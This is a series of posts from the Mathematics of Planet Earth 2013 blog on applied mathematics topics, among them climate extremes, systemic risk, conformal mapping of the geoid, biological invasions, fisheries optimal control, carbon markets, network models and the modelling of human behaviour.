    When discussing extreme events, it is generally better to use anomalies, rather than absolutes. Anomalies more accurately describe climate variability and give a frame of reference that allows more meaningful comparisons between locations and more accurate calculations of trends. Consider, for example, the global average temperature of the Earth’s surface. We have a fairly reliable record going back to 1880, but rather than looking at the temperature itself, we use the temperature anomaly to study extremes. The figure shows the global temperature anomaly since 1950 relative to the average of these mean temperatures for the period 1961-1990.

    Global temperature anomaly from 1950 to 2011 relative to the base period 1961–1990. (Reprinted with permission from World Meteorological Organization (WMO).)

    We see that the year 2010 tied with 2005 as the warmest year on record. The year 2011 was somewhat cooler, largely because it was a La Niña year; however, it was the warmest La Niña year in recent history.

    While the global mean temperature for the year 2010 does not appear much different from previous years, exceeding the 1961-1990 average by only about $0.5^\mathrm{o}$C, the average June temperature exceeded the corresponding 1971-2000 average by up to $5^\mathrm{o}$C in certain regions, and the same year brought heat waves in North America, western Europe, and Russia. Observed temperature anomalies were, in fact, much higher during certain months in certain regions and it is likely that these extremes were even more pronounced at individual weather stations.

    Since localized extremes cause disruptions of the socioeconomic order, from crop failures to forest fires and excess deaths, they are of considerable interest to the public. To assess the likelihood of their occurrence, we need both access to data and rigorous statistical analysis. Until recently, reliable data have been scarce for many parts of the globe, but they are becoming more widely available, allowing research of extreme events on both global and regional scales. The emphasis shifts thereby from understanding climate models to assessing the likelihood of possibly catastrophic events and predicting their consequences. For what kind of extreme events do we have to prepare? How often do these extremes occur in a stationary climate? What magnitudes can they have? And how does climate change figure in all this?

    Adapted from the forthcoming book “Mathematics and Climate” by Hans Kaper and Hans Engler; SIAM, Philadelphia, Pennsylvania, USA (OT131, October 2013).

    Posted in Extreme Events, Probability, Statistics, Weather | 1 Comment

    Systemic Risk in Complex Systems

    Ten years ago today (8/14/2003), the northeastern U.S. suffered the worst blackout in U.S. history, when about 15 million people lost power. The massive loss of power was attributed to a small event that cascaded through the complex power distribution system.

    This raises the more general question of systemic risk in complex systems – a topic about which mathematics has much to say. The issue is not limited to the power grid, although that too is very much in the news today. Other complex systems including ecological systems, banking systems and large engineered systems can also exhibit cascading failures through interconnected components.

    What can mathematics say about systemic risk in such complex networks? There are a number of resources on this topic. A talk by George Papanicolaou, which focused primarily on risk in the financial sector, may be heard (audio synchronized to viewgraphs) on line. An article by James Case (SIAM News, December 2013) also covered this talk.

    Furthermore, the U.S. National Academy of Sciences’ Board on Mathematical Sciences and its Applications issued a report in 2007 that addresses many of these issues as well.

    The area of systemic risk remains an active field of research in mathematics and statistics, with many interesting and difficult problems. Some of these are touched upon in the above references.

    With further research one hopes to avoid being kept in the dark by a small event that magnifies as it propagates through a complex system.

    And then there is the banking system….

    Posted in Complex Systems, Mathematics, Networks, Risk Analysis, Statistics | Leave a comment

    Seeing the Earth from Above

    The Earth is undergoing massive changes that are difficult to measure and even harder to forecast. Modeling these changes is required for predicting, planning for, and mitigating the effects of natural and man-made disasters. Processes that affect and feed off of these changes are governed by powerful and complex dynamics that occur at different spatio‐temporal scales. Examples of short‐time scale events include floods, hurricanes, earthquakes, tsunamis, wild fires, and volcanic eruptions. Long-time scale processes include drought, spread of invasive species, population growth, changes in land use, soil degradation, sea level rise, ocean acidification, permafrost melting, glacier retreat, sea ice loss, degradation of fresh water resources, land subsidence, climate change, deforestation, desertification, and critical habitat loss. Obtaining a better understanding of these processes involves the instrumental task of first harnessing the data associated with all relevant sensor modalities and then identifying the proper mathematical models and the computational machinery to process and extract relevant information from the data.

    Terabytes of geospatial data are collected daily from a variety of sources. The amount of data is massive since these data are often high dimensional. Processing them and extracting useful information from them are major challenges that need to be overcome. Novel mathematical imaging techniques have already begun to address some of these problems. Mathematical and engineering advancements have led to methods for sub‐Nyquist sampling rates. These methods are significantly impacting the manner in which sensor acquisition systems collect, model, and analyze the data. To render the exploitation more tractable, researchers have developed innovative techniques for projecting the data into lower dimensional spaces. One such example has been the groundbreaking numerical developments for representing data with appropriately constructed dictionaries, sometimes learned from the data itself. These dictionaries are advantageous for many reasons, including computational efficiency, ease in which they are implemented, accuracy, and reliability. These and other new paradigms will significantly impact the manner in which we collect, store, transmit, and process data that has been derived from multiple sensors.

    The IMA is offering a workshop, “Imaging in Geospatial Applications” from September 23 to 26, 2013. The workshop will address novel mathematics, new sensor technology, and computational imaging techniques that can lead to innovative ways of exploiting geospatial image information. Since cross‐discipline communication between those who observe Earth and those who strive to model the Earth’s processes must be effective and robust, participants will include scientists who are directly involved in the applications as well as mathematicians, computer scientists, and engineers who are developing mathematical approaches for representing, processing, and analyzing image data. The workshop aims to foster communication among these disciplines in order to validate and better understand models of the Earth’s complex processes by effectively using geospatial image data. Details about the workshop are available here.

    Those interested in the workshop may still apply for participation. They may also follow the workshop on-line in real time or view the talks on video.

    Posted in Data Visualization, Mathematics, Workshop Announcement | Leave a comment

    The Mathematics Behind Biological Invasions

    When asked to give an invited lecture at the first ever Mathematical Congress of the Americas, I jumped at the chance. This would be an opportunity to meet new colleagues from the Americas and to share my interest in mathematical ecology. I found the meeting, in the beautiful town of Guanajuato, to be well organized and friendly. It was structured so as to allow lots of mixing and time to discuss research over refreshments or lunch.

    My particular talk focused on “The Mathematics Behind Biological Invasions,” a subject near and dear to my heart. I enjoy talking about it for three reasons: it has a rich and beautiful history, going back to the work of Fisher, Kolmogorov, Petrovski, Piscounov and others in the 1930’s; the mathematics is challenging and the biological implications are significant; and, finally, it is an area that is changing and growing quickly with much recent research.

    The major scientific question addressed in my talk was: how quickly will an introduced population spread spatially? Here the underlying equations are parabolic partial differential equations or related integral formulations. The simplest models are scalar, describing growth and dispersal of a single species, while the more complex models have multiple components, describing competition, predation, disease dynamics, or related processes. Through the combined effects of growth and dispersal, locally introduced populations grow and spread, giving rise to an invasive wave of population density. Thus the key quantity of interest is the so-called spreading speed, the rate at which the invasive wave sweeps across the landscape.

    Ideally one would like to have a formula for this speed, based on model parameters, that could be calculated without having to numerically simulate the equations on the computer. It turns out that such a formula can be derived in some situations and not in others. My talk focused on when it was possible to derive a formula. One useful method for deriving a spreading speed formula is based on linearization of the spreading population about the leading edge of the invasive wave, and then associating the spreading speed of the nonlinear model with that of the linearized model. If this method works, the spreading speed is said to be linearly determined.

    It turns out that the conditions for a linearly determined spreading speed, while well understood for scalar models, is challenging to analyze for multicomponent models of the sort that include interactions between species. In some cases, such as competition, the results have been worked out, but in many other cases remains an open question.

    I was gratified that the talk generated discussion and questions, and I hope that the subsequent follow up will result in new collaborations with colleagues in the Americas who are interested in similar questions.

    Mark Lewis
    University of Alberta
    mark.lewis@ualberta.ca

    Posted in Biology, Ecology, Epidemiology | Leave a comment

    Summer Break

    The MPE2013 Daily Blog is taking a summer break. The next post is scheduled for August 15, 2013.

    Posted in General | Leave a comment

    Drawing Conformal Maps of the Earth

    This contribution can be seen as a follow-up of that of July 5 where I discussed the Earth as a deformed sphere that geodesists choose to approximate by the geoid: the geoid is the level surface of the gravitational field corresponding to the mean sea level (MSL).

    It has been known since Gauss that it is not possible to draw maps of the Earth that preserve ratios of distances. But it is possible to find projections of the sphere that preserve ratios of areas: these projections are called equivalent. A typical example is the horizontal projection of Lambert, which was in fact already known from Archimedes. It is also possible to find projections of the sphere that preserve angles: these projections are called conformal. One of them is the stereographic projection, which was already known to the Greek Hipparchus. A second one is the Mercator projection. It is remarkable that Mercator and Hipparchus could prove that their respective projections are conformal without the use of differential calculus.

    But if we consider the geoid, is it possible to draw conformal maps of it? The answer is still positive, but the proof is more subtle. For instance, in the case of conformal mapping, we find elements of a proof in the book “Differential Geometry of Curves and Surfaces” of Do Carmo, but he refers to “Riemann surfaces” by Lipman Bers for a full proof. The proof comes to show that a regular differentiable surface can be given a conformal structure, i.e., is a Riemann surface, and the conformal structure is obtained through solving a Beltrami equation.

    Let us discuss the particular case where the geoid is rotationally symmetric around the Earth’s axis, by generalizing Mercator’s strategy. We consider two angles: $L$ is the longitude and $\ell$ the latitude, and we can make the hypothesis that any half-line from the center of the Earth along the direction corresponding to longitude $L$ and latitude $\ell$ cuts the Earth in a point at a distance $R(\ell)$ from the center of the Earth. The intersection curves of the geoid with the half planes where $L$ is constant are called the meridians of the geoid, and we wish them to be represented by vertical lines on the map. Similarly, the intersection curves of the geoid with the cones where $\ell$ is constant are called the parallels of the geoid, and we represent them on the map by horizontal segments of length $2\pi$, parameterized by $L$. Let us consider a small region corresponding to a width of $dL$ and a height of $d\ell$ and with corner at $(L,\ell)$ on the geoid. On the geoid, the length of this small region in the direction of the meridians is approximately $\sqrt{R^2+ (R’)^2}d\ell$ and its width (in the direction of the parallels) is approximately $R\cos \ell \;dL$. Hence, the diagonal makes an angle $\theta$ wit the parallels such that $\tan \theta \simeq \frac{\sqrt{R^2+ (R’)^2}}{R\cos\ell} \frac{d\ell}{dL}$.

    Now we must compute the projection on the map of a point of longitude $L$ and latitude $\ell$. Its coordinates will be $(L, F(\ell))$. On the map, the small region is represented by a rectangle of width $dL$ and of height $F'(\ell)d\ell$. Hence, the diagonal makes an angle $\theta’$ with the horizontal direction, such that $\tan\theta’= F'(\ell)\frac{d\ell}{dL}$.

    The mapping is conformal if $\theta’= \theta$, which means that $F'(\ell)= \frac{\sqrt{R^2+ (R’)^2}}{R\cos\ell}$, from which $F$ can be obtained by integration.

    Note that we could have used the same technique to find an equivalent mapping. If we let $r(\ell)= \frac{R(\ell)}{R(0)}$, then the projection preserves ratios of areas if $F'(\ell)= r\cos\ell\sqrt{r^2+ (r’)^2}$, from which $F$ can again be obtained by integration.

    Christiane Rousseau

    Posted in Mathematics | Leave a comment

    Optimal Control and Marine Protected Areas

    There are two standard ways to restrict harvesting of fish in order to maintain or improve the population. One way is to establish marine protected areas where fishing is prohibited and the other is to allow fishing everywhere but at something less than maximal capacity. Just a few days ago I noticed an interesting preprint in arXiv that sets up a mathematical framework for deciding whether protected areas should be used and, if so, where they should be established. The article is Optimal Placement of Marine Protected Areas by Patrick De Leenheer, who is an applied mathematician at the University of Florida.

    He sets up the problem as one in optimal control theory, which provides a much broader spectrum of possible harvesting strategies by allowing a harvesting rate that varies from point to point along the one dimensional coastline. An interval over which the harvesting rate is zero corresponds to a protected area, and so there could conceivably be several protected areas separated by regions that allow some harvesting. De Leenheer proposes to maximize a weighted sum of the total yield and the average fish density:

    The motivation for choosing this measure is that it incorporates two of the main measures that have been used in the past, namely yield and density, coupled with the fact mentioned earlier, that MPA’s are believed to have opposite effects on these measures.

    To me it is not intuitively clear what to expect for the optimal strategy, but De Leenheer’s analysis shows that there are three possible optimal strategies that can occur. Just which one depends on the two parameters: (1) the weight given to the average density in the objective function and (2) the length of the coastline. When the weight of the average density is below a threshold, then it is optimal to allow fishing at maximal capacity everywhere. But when the weight exceeds the threshold value, then the length of the coastline comes into play. Below a certain critical value for the length parameter it remains optimal to allow fishing everywhere, but above the critical length it is optimal to install a single marine reserve in the middle of the coast line.

    Kent Morrison
    American Institute of Mathematics

    Posted in Resource Management, Sustainability | Leave a comment

    Mathematics and Sustainability – A Trio of Autumn Workshops

    In support of worldwide MPE2013 efforts, NSF’s Mathematical Biosciences Institute (MBI) at Ohio State University is hosting three autumn workshops aimed at the interface of mathematics and the science of sustainability. People interested in attending are welcome to apply here.

    • Sustainability and Complex Systems (September 16-20, 2013)

      Creating usable models for the sustainability of ecosystems has many mathematical challenges. Ecosystems are complex because they involve multiple interactions among organisms and between organisms and the physical environment, at multiple spatial and temporal scales, and with multiple feedback loops making connections between and across scales. The issue of scaling and deriving models at one scale from another is well known to lead to substantial mathematical issues, as in going from descriptions of stochastic spatial movement at the population scale from the individual scale and as in getting diffusion limits. Here, for example, recent work has focused on alternatives to the diffusion limit. The mathematical challenges in the analysis of full ecosystems are truly great.

      This workshop aims to engage empiricists, computational and mathematical modelers, and mathematicians in a dialogue about how to best address the problems raised by the pressing need to understand complex ecological interactions at many scales. Its ultimate goal is to initiate transformative research that will provide new approaches and techniques, and perhaps new paradigms, for modeling complex systems and for connecting different types of models operating at different levels of detail. An important feature of the workshop will be afternoon sessions devoted to case studies with the goal of starting new collaborations and new research directions.

    • Rapid Evolution and Sustainability (October 7-11, 2013)

      Although evolution is often thought of as a slow process that proceeds on the time scale of millennia, in fact there are many very rapid evolutionary processes, often called contemporary evolution, that have profound effects on human health and welfare. Understanding the dynamic behavior of such processes is difficult because one is typically studying the co-evolution of two or more interacting complex systems. Whether the context is giving or not giving drugs, choosing to use or not use pesticides, or choosing when to use them, these are choices that have political, ethical and economic consequences. The consequences themselves depend in many cases on changing human cultural behavior, changing technology, and climate change. Mathematical modeling, including the invention of new mathematical structures, can help us understand these rapidly co-evolving systems and thus make clear the likely consequences of various policy choices.

    • Sustainable Management of Living Natural Resources (November 4-8, 2013)

      Natural resources, such as forests, fish, land, and biodiversity, while renewable, are being pushed to the brink and beyond by sectorial mismanagement and the resulting cumulative impacts on the macroscopic environmental and ecosystem conditions. For many, the solution is to take a more holistic or ecosystem-based approach to management (EBM). Mathematical models for EBM need to take into account both the dynamics of coupled ecological and economic systems and the game theoretic issues arising from the differing interests and values of different stakeholders. Some mathematical approaches to those issues have been developed in both ecology and economics.

      An important goal of the mathematical modeling is to analyze the likely consequences of policy choices proposed by Congress, government agencies, or eco-system managers. These choices will have important consequences not only for ecological systems, but also for the health and economic well being of human communities. Therefore, this workshop will have a public policy component, and at least two afternoons will be devoted to case studies which will develop new research directions.

    Posted in Mathematics, Sustainability, Workshop Announcement | Leave a comment

    AGU Science Policy Conference, Washington, DC, June 24-26

    The American Geophysical Union (AGU) held its 2nd Annual Science Policy Conference in the Walter E. Washington Convention Center in Washington, DC. This was a three-day meeting (June 24-26); because of other commitments I could only attend the second day (June 25) of the conference.

    The AGU, recognizing the societal relevance of geophysical research, is committed to improving the connection between science and policy. At the Science Policy Conferences, the AGU brings together Earth and space scientists, students, federal and state agency representatives, and industry professionals to explore ways for the geophysical sciences research community to inform and support sound policy decisions.

    The theme of the 2nd Annual Conference was “Preparing for the Future: The Intersection Between Science and Policy,” and the topics selected for this conference were Arctic Forum, Climate Change, Energy, Hazards, Oceans, and Technology and Infrastructure.

    The conference was attended by approximately 250 participants (my estimate) from academia, government and public service organizations, and the private sector.

    The first day (which I did not attend) was devoted to a workshop “to hone your ability to communicate effectively with policy makers, the press, and the general public.”

    The second day started with a plenary session, with speakers Dr. Cora Marrett (Acting Director, NSF) and Mr. Bart Gordon (Partner K&L Gates, former U.S. Representative,  former Chair of the House Committee on Science and Technology). Their presentations focused on the role of science for innovation and the challenges at the interface of science and policy.

    The plenary session was followed by nine panels, on Energy, Hazards, and Arctic Forum. Each topic was covered by three consecutive panels, each time with different panelists. I attended a panel on the Arctic Forum in the morning, a panel on Hazards in the first part of the afternoon, and a panel on Energy in the second part of the afternoon. A poster session ran simultaneously with the panel sessions and during the breaks between panels.

    The Arctic Forum focused on Arctic Change Research and U.S. Interagency Collaborations. It was moderated by Brendan Kelly, Ass. Director for Polar Science at the White House Office of Science and Technology Policy, with panelists Kathy Crane (NOAA), Gary Geernaert (DOE), Simon Stephenson (NSF), and Diane Wickland (NASA). They gave overviews of what is happening in their agencies for Arctic change research.

    The Hazards panel focused on The Science of Recent Severe Weather Events. It was moderated by Kelly Klima, Research Scientist at Carnegie Mellon University, with panelists Janice Coen (Project Scientist, NCAR), Andrew Castaldi (Senior VP, Swiss Re–a reinsurance company), Radley Horton (Research Scientist, Columbia University), and Sue Minter (Dep. Secretary, Vermont Department of Transportation). They discussed the possible connections between climate change and severe weather events, as well as the social and economic effects of droughts, wildfires and other disasters. All four talks were very informative; Ms. Coen discussed the complicated dynamics of wildfires, Mr. Castaldi explained in detail how risk is quantified in the insurance industry, Dr. Horton described the planning for NYC before and after Hurricane Sandy, and Ms. Minter discussed the lessons learned from tropical storm Irene (August 27, 2011).

    The Energy panel focused on Science Needs for U.S. Offshore Energy Development. It was moderated by Nick Juliano, a reporter for Greenwire and E&E News, with panelists Belinda Batten (Northwest National Marine  Renewable Energy Center), Rodney Cluck (Bureau of Ocean Energy Management, U.S. Dept of the Interior), and Branko Kosovic (NCAR). By 2050, renewable sources are expected to to supply as much as 80% of energy demand. The panelists discussed the status of research and development of various energy technologies based on waves, tides, current, etc., collectively known as MHK (=Marine Hydrokinetics), and wind.

    After the panel sessions, the conference participants were invited to a reception in the Rayburn House Office Building on Capitol Hill, where AGU Presidential Citations for Science and Society were given to James Balog (Founder/Director of “Extreme Ice Survey”), Richard Harris (Science Correspondent NPR), and Rush Holt (U.S. House of Representatives). The citations honored the recipients for their contributions to the public discussion of science.

    The third day (which I did not attend) had a similar format as the second day, with panels on Technology and Infrastructure, Climate Change, and Oceans.

    The conference was very well organized. I thought it was an interesting way to bring policy issues to the attention of the science community. Something we might consider for the mathematical sciences community.

    Posted in Climate Change, Conference Report, Geophysics | Leave a comment

    Fire Season

    “It’s fire season in the forests and wildlands of America.” So began an article by Barry Cipra (Fighting Fire with Data, SIAM News, July 2004). I recalled this article after hearing about the tragic events in the forest fires in Arizona earlier this week, and by the news of the fires near Colorado Springs that threatened the homes of a number of my former colleagues.

    Cipra’s article reported on efforts by mathematicians and computational scientists working with NCAR (the National Center for Atmospheric Research) to develop real-time data-driven simulations of wildfires for use by fire fighters in the field. The simulations employ a coupled weather-wildfire model. The article was based in part on a talk at the 2003 SIAM Conference on Computational Science and Engineering by Janice Cohen, “Computational Science and Engineering Aspects of Wildland Fire Modeling.” I wondered what had become of that work and whether those tools had found their way into the hands of fire fighters.

    Then today a received a copy of press release from the University of Arizona that shows that indeed research has continued and that mathematical/computational tools like those described a decade ago are indeed being used, and are playing a role in analyzing what went wrong in the tragedy at the Yarnell Hill Fire.

    As the press release points out, the problem with forecasts based on weather models is that the predictions are expressed in terms of percentages, and decisions must be made in the light of these uncertainties.

    It all indicates the further need for research to reduce the uncertainties and to better understand the risks.

    James M. Crowley
    Executive Director, SIAM

    Posted in Data Visualization, Meteorology, Natural Disasters, Weather | Leave a comment

    What Does Altitude Mean?

    If we model the Earth as a sphere of radius $R$, then the altitude of a point is its distance to the center of the Earth minus $R$. But we know that the surface of the Earth is not exactly a sphere and is, in fact, better approximated by an ellipsoid. Again, it is possible to generalize the definition of altitude for an ellipsoid of revolution. For a given point $A$, we consider the segment joining it to the center $O$ of the ellipsoid. The half-line $OA$ cuts the ellipsoid in a point $B$, and the altitude is the difference between the length of $OA$ and that of $OB$.

    So far, no problem. However, the Earth is not a perfect ellipsoid of revolution. Then what is the center of the Earth, and what means altitude? When we represent the Earth by a solid sphere or ellipsoid, we implicitly assume that we have a surface that approximately fits the surface of the Earth’s oceans. (Of course, the surface of the oceans varies with the tides, and we must consider the mean surface of the Earth’s oceans.) This surface is called a geoid. We then add the topographical details to the geoid.

    The point of view taken in geodesy is to consider the gravitational field generated by the Earth. On the surface of the Earth, the gravitational field is directed toward the Earth’s interior, and the center of gravity of the Earth, which is a natural candidate for the Earth’s center, is a singular point of this gravitational field. The gravitational field comes from a potential, and it is natural to consider the level surfaces of this potential. Thus, a geoid will be an equipotential of the gravitational field, chosen to give the best fit of the surface of the oceans with the geoid corresponding to the mean sea level. The differences between the geoid and an ellipsoid come not only from the presence of mountains, but also from the density variations inside the Earth. The geoid is then taken as the surface of altitude zero, and the altitude of a point $A$ is defined as its distance to the geoid measured along the normal through $A$ to the geoid. This normal is easily determined in practice, since it corresponds to the vertical as indicated by a carpenter’s level or a surveyor’s plumb bob. Let $O$ be the center of the geoid and $B$ the intersection point of the half-line $OA$ with the geoid. In general, the altitude of $A$ is not exactly equal to the difference between the length of $OA$ and that of $OB$, because the normal to the geoid through $A$ may not pass through $O$.

    The difference between the geoid and an ellipsoid of revolution approximating the Earth can be up to 100 meters; hence, it is quite significant. The first GPS would calculate the altitude as the distance to an ellipsoidal model of the Earth. Modern receivers are now able to correct this measurement and give the real altitude over the geoid.

    Posted in Geophysics, Mathematics | Leave a comment

    How Much for My Ton of CO2?

    Mathematics analyzes numerous aspects of financial markets and financial instruments. For the markets trading CO2 emissions (direct or the CO2 equivalent for other greenhouse gases), mathematics is used to decide how cap-and-trade rules will operate. The cap-and-trade mechanism sets future caps for pollution emissions and issues emission rights that can be bought and sold by the companies concerned. Producers that overstep their allotted cap must pay a penalty. Designing a market involves deciding in particular on a timetable for using permits, the initial mode of distribution (e.g., free attribution, bidding system, etc.), and how penalties operate.

    These trading markets are still in their early stages. Under the impetus of the Kyoto protocol and its extension, a few attempts have been made to open up markets in some countries, beginning with the European Community in 2005 and followed by more recent initiatives in Australia, China and some American states.

    Emissions trading provides a financial incentive to reduce greenhouse gas emissions from some sectors of economic activity. From theory to practice, mathematics can help obtain a clearer view of design choices so that setting up emissions trading can lead to effective reduction. Emissions trading also affects the price of goods, because greenhouse gas emissions are an externality of production, as well as the price of raw materials.

    Game theory can be used to analyze interaction between stakeholders in these markets and to understand the connection between the design of cap and trade, the prices set for commodities such as electricity, windfall effects, and favored production technologies.

    In addition, industrial production models can be used by a stakeholder subject to CO2 penalties. For a fixed market design, digital simulation can be used to quantify the stakeholder’s activity balance sheet (i.e., wealth produced, CO2 discharged) and calculate its subjective price to acquire a permit. Using this information, different designs can be tested and compared in line with varied criteria, including emissions reduction.

    For more information:
    “Carbon Value project: a quantitative study of short-term carbon value” with INRIA and MINES ParisTech.

    Mireille Bossy (Inria Sophia Antipolis)
    Nadia Maïzi (MinesParisTech Sophia Antipolis)
    Odile Pourtallier (Inria Sophia Antipolis)

    Posted in Economics, Energy, Political Systems | Leave a comment

    Talking Across Fields

    The AIM workshop on exponential random network models was an experiment, bringing together people in applied social sciences, biologists, statisticians, and mathematicians who are interested in the emerging field of graph limit theory.  All of us think about networks in some form or other, but the language, examples and aims are often very different.  There has been spectacular progress in the mathematics of large networks, mostly for dense graphs (if there are n vertices there are order n2 edges). A good deal of this is captured in Lovasz’s recent book.  There has also been spectacular growth in the availability and use of real network data.  Some of this is huge (Facebook, Twitter, the Web) but some networks are smallish (I think of 500 tuberculosis patients in Canada with and edge between them if they have had contact in the past year).  Social scientists and others have developed a suite of techniques for working with such network data.  One central focus is exponential random graph models and its wonderful implementation in the STATNET package.

    The experimental types have discovered some really strange things. For simple, natural models (incorporating, say, the number of edges and the number of triangles) standard fitting methods (e.g., maximum likelihood) go crazy, giving very different looking graphs on repeated simulation from the same model.  The theorists had parallel results but in a limiting sense.  There was a lot of common ground possible BUT the usual “turf” and applied/theoretical barriers could well get in the way.  THEY DIDN’T and real progress was made.  Here are some of the things I learned:

    1) For theorists, one question is “does anyone really use these models for anything real?” I found lots of examples.  Perhaps most striking, co-organizer Martina Morris and her colleagues fit these models to sexual contact data from Africa.  The incidence of HIV in these countries varies by factors of 10 (with something like 40% infected in Botswana).  What causes the disparity?  The data is extensive, but of poor quality.  Using exponential models, the different data sets can be cleaned up and compared.  She found that a simple factor: concurrent partnerships, could explain a lot of the variability.  Different countries have about the same number of lifetime sexual partners (and the same as for Western countries) BUT there are big differences in concurrency.  After discovering this, Martina got governments and tribal leaders and anyone else who would listen to stigmatize the behavior and it really seems to make a difference.  There is a lot of substance hiding behind this paragraph and their work is a thrilling success.  Go take a look.

    2) The theorists had no idea how well developed the computational resources are.  One had only to suggest a project and someone could sit down in real time and try it out.  STATNET and R are amazing.

    3) I don’t think that the applied people had internalized some of the theoretical progress.  Graph limit theory is full of infinite dimensional analysis and its main applications have been to extremal graph theory.  After some of its potential applications (see below) were in believable focus, there was a lot of explaining and discussing.  This was useful for me too.

    4) Here is a success story from the conference: An exponential random graph model has an “unknowable” normalizing constant, which is a sum over all graphs on n nodes.  Even for little graphs (n=30) this is too big to handle with brute force.  Chatterjee and Diaconis proved a large sample approximation for the normalizing constant.  This was in terms of an infinite dimensional calculus of variations problem, but sometimes it reduces to a 1-dimensional optimization.  Their approximation is based on large deviations bounds (due to Chatterjee-Varadhan).  Its relevance to finite n could and should be questioned.  Mark Handcock and David Hunter programmed the tractable approximations and compared them to Monte Carlo approximations that are well developed in the applied world.  To everyone’s amazement, the approximations were spot on—even for n=20.  These approximations have parameters in them and are used to compute maximum likelihood and Bayes estimates.  IF things work out, there are really new tools to use and develop.

    Two questions had all of us interested.  Once one realizes that this route is interesting, one can try to find approximations of the not-so-nice infinite dimensional problems by disceretizing.  This is quite close to what physicists do in “replica symmetry breaking,” so there are ideas to borrow and specific projects to try out.  Second, some of the statistics that the applied community finds natural are not continuous in graph limit space.  What does this mean in practice AND can the theorists come up with continuous functionals that are similarly useful.

    There are a dozen other successes.  Some small, some big.  I think that all of us enlarged our worldview and made some useful new scientific friends.  BRAVO AIM!

    Persi Diaconis
    Stanford University

    Posted in Data Assimilation, Epidemiology, Mathematics, Social Systems, Statistics | Leave a comment

    Slithering Away: A Warming Planet Displaces Snakes’ Habitat

    When paleobiologist Michelle Lawing joined field expeditions to collect rattlesnake data in the deserts of Southwestern America, she didn’t expect that her research would uncover such grim predictions for the rattlesnakes and their habitats in the future.

    To survive the Earth’s climate changes over the next century, rattlesnakes will need to migrate as much as 1,000 times more quickly as they have in the past to find more suitable habitats, according to Lawing’s and her colleague’s study published in the journal PLoS One in 2011.

    Lawing and her co-author David Polly, a geology professor at Indiana University Bloomington, synthesized information from climate-change cycle models, indicators of climate from the geological record, evolution of rattlesnake species and other data to develop what they call “paleophylogeographic models” for rattlesnake ranges. Using this information they mapped the expansion and contraction at 4,000-year intervals of the ranges of 11 North American species of the rattlesnake genus Crotalus.

    The results predicted the future rate of change in suitable habitat to be two to three orders of magnitude greater than the average rate of change over the past 300 millennia, a time that included three major glacial cycles and significant variation in climate and temperature.

    “It is clear that the climate has changed in the past and will continue to change in the future, but what is surprising is the rate of change. I did not anticipate the magnitude of the difference between modeled rates of change in the past and future projections of the geographic displacement of suitable habitats,” Lawing says.

    Scientists question whether the snakes will be able to move fast enough to keep up with the changes. “If the past is any indication of the future, then probably they can’t,” Lawing says.

    Lawing completed the study while a doctoral student in the geological sciences and biology at Indiana University, Bloomington. Now a postdoctoral fellow at the National Institute for Mathematical and Biological Synthesis (NIMBioS), Lawing is developing a new framework called Dynamic Rotation Method for modeling the evolution of multivariate systems and for reconstructing phylogenetic changes.

    The method treats co-varying traits as a mathematical system that rotates, translates and scales through trait space. Lawing hopes that the application of the method will provide a synthetic interdisciplinary framework for integrating and comparing the study of phenotypic evolution, modularity and integration, geometric morphometrics, niche modeling, and habitat modeling in a phylogenetic context.

    For more information about Lawing and her research, including a link to her seminar about the rattlesnake study, click here.

    Reference:

    Lawing AM, Polly PD. 2011. Pleistocene climate and phylogeny predict 21st century changes in rattlesnake distributions. PloS ONE 6: e28554


    Posted in Biosphere, Climate Change | Leave a comment

    Predicting the Unpredictable – Human Behaviors and Beyond

    No matter how surprising, outlandish, or even impossible it may seem, one of the next challenges of modern applied mathematics is the modeling of human behaviors. This has nothing to do, however, with the control of minds. Rather, thanks to its innate reductionism, mathematics is expected to help shed some light on those intricate decision-based mechanisms which lead people to produce, mostly unconsciously, complex collective trends out of relatively elementary individual interactions.

    The flow of large crowds, the formation of opinions impacting on socio-economic and voting dynamics, the migration fluxes, and the spread of criminality in urban areas are examples which are quite different but have two basic characteristics in common: First, individuals operate almost always on the basis of a simple one-to-one relationship. For instance, they try to avoid collisions with one another in crowds, or they discuss with acquaintances or are exposed to the influence of media about some issues and can change or radicalize their opinions. Second, the result of such interactions is the spontaneous emergence of group effects visible at a larger scale. For instance, pedestrians walking in opposite directions on a crowded sidewalk tend to organize in lanes, or the population of a country changes its political inclination over time, sometimes rising suddenly against the regimes.

    In all these cases, a mathematical model is a great tool for schematizing, simplifying, and finally showing how such a transfer from individual to collective behaviors takes place. Also, a mathematical model raises the knowledge of these phenomena, which is generally initiated mainly through qualitative observations and descriptions, to a quantitative level. As such, it allows one to go beyond the reproduction of known facts and face also situations which have not yet been empirically reported or which would be impossible to test in practice. In fact, one of the distinguishing features of human behaviors is that they are hardly reproducible at one’s beck and call, just because they pertain to living, not inert, “matter.”

    As a matter of fact, historical applications of mathematics to more “classical” physics (think, for example, of fluid or gas dynamics) are also ultimately concerned with the quantitative description and simulation of real world systems, so what is new here? True, but what makes the story really challenging from the point of view of the mathematical research is the fact that to date we do not have a fully developed mathematical model for the description of human behaviors. The point is that the new kinds of systems mentioned above urge applied mathematicians to face some hard stuff, which classical applications have only marginally been concerned with. Just to mention a few key points:

    • A nonstandard multiscale question. Large scale collective behaviors emerge spontaneously from interactions among few individuals at a small scale. This is the phenomenon known as self-organization. Each individual is normally not even aware of the group s/he belongs to and of the group behavior s/he is contributing to, because s/he acts only locally. Consequently, no individual has full access to group behaviors or can voluntarily produce and control them. Therefore, models are required to adopt nonstandard multiscale approaches, which may not simply consist in passing from individual-based to macroscopic descriptions by means of limit procedures. In fact, in many cases it is necessary to retain the proper amount of local individuality also within a collective description. Moreover, the number of individuals involved is generally not as large as that of the molecules of a fluid or gas, which can justify the aforesaid limits.
    • Randomness of human behaviors. Individual interaction rules can be interpreted in a deterministic way only up to a certain extent, due to the ultimate unpredictability of human reactions. It is the so-called bounded rationality, which makes two individuals react possibly not the same, even if they face the same conditions. In opinion formation problems this issue is of paramount importance, for the volatility of human behaviors can play a major role in causing extreme events with massive impact known as Black Swans in the socio-economic sciences. Mathematical models should be able to incorporate, at the level of individual interactions, these stochastic effects, which in many cases may not be schematized as standard white noises.
